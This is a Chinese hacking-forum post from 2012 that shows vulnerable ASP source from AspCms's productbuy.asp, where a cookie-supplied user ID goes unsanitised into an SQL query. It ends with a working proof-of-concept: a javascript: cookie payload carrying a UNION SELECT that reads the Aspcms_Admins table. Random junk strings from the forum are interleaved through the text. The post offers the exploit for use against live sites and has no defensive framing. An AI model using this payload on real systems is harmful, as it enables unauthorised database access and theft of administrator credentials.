好久没上土司了,上来一看发现在删号名单内....., ]! x2 ^% p* B9 G3 ?
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。" W) O' X9 e# \; f6 v' c/ T
废话不多说,看代码:- U1 |! K* Q/ v& B
$ G; C, c) j- X% Z! n<%7 `8 ]. {/ [; b# h# h4 i
/ \- u- f$ W. @/ `( w- c' U& M7 qif action = "buy" then# P" f- r& n. o. w8 B$ y
$ f& u! T; M( J) [# @0 _
addOrder()
" n6 H! M8 E z, _# G. d% [
2 }5 X9 M7 Q+ B$ @, \5 Melse1 u, G5 Y( a# K7 a. X8 S
: r) y8 ?) S4 W) F- l; g
echoContent() Y+ R: x6 \! p3 a9 l
; ^& ]# L k, C7 a
end if
) M9 f+ w6 W3 m$ m5 x0 Q. ]5 }, m) J+ |6 E2 _4 p u% K- N, }
- ]6 y0 E9 _7 p d a( {0 S7 W2 v. U0 c4 ^5 y- y3 m
……略过" U/ T9 C9 _3 I3 D
3 W; u; S! m" }2 Q5 t" k& c
" \7 U( P) D6 `. Q, g- B8 N+ q
; _" w* P, U6 q$ N! R# ~Sub echoContent()
2 `: Q- ?" ^6 t6 ^, _' ^/ @
6 k( O+ m. g4 Z: x; k1 _ dim id+ j) D! P7 \# m( n6 q: H$ T
/ o6 m2 g. t% N( I$ r( s% z
id=getForm("id","get") H. X6 o# u+ _1 T. W+ ?
/ H8 B/ j: j+ a5 B2 w
6 q+ O j( R7 f8 N% J. n! B _ Z1 d# A
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
( L" l+ |# ^7 S& _1 X, i5 Z
9 z1 F8 l' Z i1 S
7 e0 \3 ]7 O' B) W- H. ]) C. ]( U+ P# r R" P) O' o
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")$ p' n) e$ [6 o( g
3 c, U @, l) X) U6 ~ dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct9 j2 M2 T1 K% B7 g
! B# |! I% k+ \6 O# {5 s) R0 B Dim templatePath,tempStr* {* {& X- ~1 k3 i Z! ^6 F8 |# E
# D: {2 G7 o+ f
templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"3 h- y, C' F$ E. w5 {
W" V: T: e5 ]
0 E8 n& h0 }8 @4 N% _
/ j2 f1 \5 k* M) o) S
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")5 Q* g$ l) E1 r# i
( ~2 ?( D# \/ N3 a- a3 ~
selectproduct=rsObj(0)
" Q9 ^+ E, P( t+ M% l U1 l9 u: i2 t& K( g& V
k, M# k$ j5 S* S, H3 w
" ~# a+ b4 n; u- a, d/ M; a: S9 r' } Dim linkman,gender,phone,mobile,email,qq,address,postcode
. U' t7 W7 F. Y4 C+ u9 o. z8 j2 n2 b; ^5 a6 I2 ]/ ?+ T
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",06 g; M$ O# V& l( M3 e" `9 @$ Z$ K
- J7 r0 N& C) I/ w6 `% f if rCookie("loginstatus")=1 then
: [, `5 I/ `1 X a: ]( V% t# L. g/ L
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
- m# Z1 P( V: X: \* s4 A+ |3 {3 L' t- i+ m3 M( f( }
linkman=rsObj("truename")" P5 v1 s& N, G& S% d( E
% O$ [$ m7 F# z1 m! @
gender=rsObj("gender")
; t# ~; F# i- k' p7 M% o2 e4 V( Y% Z7 `
phone=rsObj("phone")8 J5 ^5 @7 I: B% M* B3 J
$ Z; J) f0 o. U* [
mobile=rsObj("mobile")
( ]4 s* Q$ k; P5 t* `, w2 }2 _8 r2 W% a5 D) X# w8 S
email=rsObj("email")9 G; q. w' R2 `) s/ ^/ h) _) H7 }
' [% U# I( v( d8 U4 H& N. a, @ qq=rsObj("qq")
' l- h1 a3 a( d9 v9 j% h- ^) u2 c) Z7 b/ _5 m U0 X
address=rsObj("address")
" M f6 o9 U5 P2 w0 C0 d
) q5 Y6 v' s( @/ O E3 }- G postcode=rsObj("postcode")8 q. h- s; w) v( `. l" H
) p* w8 g: T7 k) d7 _+ m
else
" L$ z( ^1 ~/ v
' j0 F" o( d4 g5 @: G gender=1
; _5 _+ b. r; `5 z: o( ~1 \9 K ?- f1 b. D+ L6 _
end if
* K r$ u0 L" Q4 d' {# ]9 E( q. n' [6 X9 I
rsObj.close(): E: b4 t, h5 j% O( A6 } z
& G- L7 R7 W& [; ^. E$ e
, i5 I7 V* s! g/ E! Q, ^1 W
h2 s- j) L4 W with templateObj
+ v4 {: F# n: }1 E2 O+ D
! o4 C* \; ?1 d .content=loadFile(templatePath)
. u; E% G* `# w9 T" W) U
% i" e/ @2 }6 X# q2 e .parseHtml()
2 M; I7 `7 j3 C% s0 a3 ]1 Y' f) o1 B/ \; E
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
5 C0 F+ d3 a# A" P! a/ ?: L' P) N0 v6 ?
$ X4 V5 }1 d- m: d* w .content=replaceStr(.content,"[aspcms:linkman]",linkman) - F$ i* p8 M% c" p; \
4 H5 {* P8 r5 k+ {5 Y6 c8 q q
.content=replaceStr(.content,"[aspcms:gender]",gender) ]9 E4 [. ?. r, {
8 R4 A5 q" M8 W% V R5 S8 b5 X' i# i .content=replaceStr(.content,"[aspcms:phone]",phone) 9 G2 m1 O) T, v9 D
7 ~. Z, A2 B2 J
.content=replaceStr(.content,"[aspcms:mobile]",mobile)
6 @0 p( p/ d6 n7 r* t# Y: U/ ^1 E7 Q2 P4 i. M! ?3 O ~
.content=replaceStr(.content,"[aspcms:email]",email)
. q' Q% w7 J. ?0 c+ ?! e7 Y, @3 m6 h5 E$ B4 v
.content=replaceStr(.content,"[aspcms:qq]",qq)
) Q" L0 Z% u# {
" W* ~( ]9 G0 p" r3 N .content=replaceStr(.content,"[aspcms:address]",address) 4 d6 y- a4 ]0 F
7 S' }6 Y( S. a* a7 `7 i: N
.content=replaceStr(.content,"[aspcms:postcode]",postcode)
! H% _1 T0 p' x5 g% V9 B
) k& d. O- B( `1 @ e .parseCommon()
5 g7 l% s8 c9 A8 [# D7 K: v3 C' K( Q+ |9 Y
echo .content
5 ~8 t: A) b/ e" v7 W+ R+ F2 I9 ]' [3 {+ E, L- x: D
end with6 z: K, P1 k4 Q
$ B4 r. p; ]& a0 d2 E3 g5 g
set templateobj =nothing : terminateAllObjects, Y$ {' L+ q8 Z" D. O& N6 Z& u
/ V6 e! d+ m, m$ [' r) e5 |3 ?5 i3 NEnd Sub
3 a* `) K3 F2 l& R0 G T漏洞很明显,没啥好说的
# m, I; n- g( x7 z2 q$ r) ^poc:
, ~. H2 D! Z- ]- J; I1 S2 M% z: \& N$ Q% h, O
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子7 _# t$ p# v8 q G
+ r/ x/ {* A& _& R- r
|
发表于 2012-12-27 08:35:05
收藏
支持
反对